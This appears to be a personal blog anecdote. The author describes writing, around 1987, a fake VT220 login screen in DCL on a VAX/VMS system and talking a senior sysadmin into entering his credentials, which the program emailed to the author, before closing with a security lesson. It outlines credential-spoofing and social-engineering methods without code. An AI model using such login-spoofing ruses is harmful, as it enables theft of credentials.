The Back Story
My first security diversionary tool that I personally implemented was when I worked at former Tennessee Governor Phil Bredesen first major company, HealthAmerica. It was before he became Governor, around 1987.
The senior systems administrator was Dennis Harms (he passed away back in 2006). Dennis was always talking about how “security-conscious” he was. As a point of background, it rather irked me that he had given the “Jr. Sys Admin” job to a favored co-worker instead of me.
The social ploy – a ruse by any other term
Finally, I got him back! Basically, I designed a fake VT220 terminal login for a VAX/VMS system and then, via “social engineering,” tricked Dennis into logging in with his system admin credentials (I used some ruse about problems logging in on that terminal).
I was extremely well-versed with DCL (Digital Command Language) – the shell language for DEC VAX/VMS and Alpha minicomputers), so it was a no-brainer for me to write a “fake login screen” something like this:
=== VT220 Login screen ===
Local>
The trap is set
The trick required that I remain logged into the VAX system as myself, a non-privileged user; so that I could invoke the small bit of diversionary DCL code that I had written and leave it running to capture my target.
The DCL code was very simple and, basically, it contained a “clear screen” statement and a “Local> ” prompt. After the victim pressed “Enter” one or more times, the program then prompted for “User name” and “Password, ” just as a typical VT220 session would act. Then, the grand finale: the program silently emailed me the system admin user name and password!
The fish takes the bait – hook, line and sinker!
Never in my wildest dreams would I have imagined it would have worked so smoothly! Dennis took the bait, logged in and the trick succeeded! I hurried back to my cubicle, looked in my email and, voila, there was the system administrator password (like having the “domain admin” password in today’s IT world) – the absolute “keys to the kingdom!”
But… so that I didn’t get burned too badly for doing it, I gave Dennis a hint. He and I recently had worked on a system error that displayed a 7-digit code and, as my “hint” to Dennis, I had the DCL code display an error with that exact 7-digit code; and then I had my script log him off, so that he would clue in to the fact that he had been bitten by me.
It didn’t take him long. I quickly printed out the system admin password, deleted the related “sent” and “received” email, and emptied the wastebasket. Just as I was pulling the password page off the printer, I headed back over to the terminal and saw Dennis coming my way, smiling that somewhat crooked smile that he always smiled and, before I could hand him the printed password sheet, he said, “You burned me, didn’t you?” I smiled back and handed him the paper, saying, “I guess so, this is the System Admin password, right?”
Dennis said, “Yes, it is. You would have gotten away with it, if you had just ‘not’ displayed the error and, instead, just let the system log me in normally – I never would have known – but, you wanted me to know, didn’t you?”
The Student becomes the Teacher
I said, “Yes, Dennis, I did. Please remember: ALWAYS log off a terminal ‘before’ you start to use it, because you never know who might have left some malicious program running on it; one that might mimic a login screen’ for example.” We both smiled and shook hands and Dennis quickly moved to change the system admin password.
The point: You never can believe everything you see and, sometimes, you only see what a hacker ‘allows’ you see! If something seems “off,” then likely it is. Never forget to follow security best practices (physical as well as software), because hackers and social engineers will “own you” when you are in your perfect “comfort zone;” just when you are sailing along without a care in the world.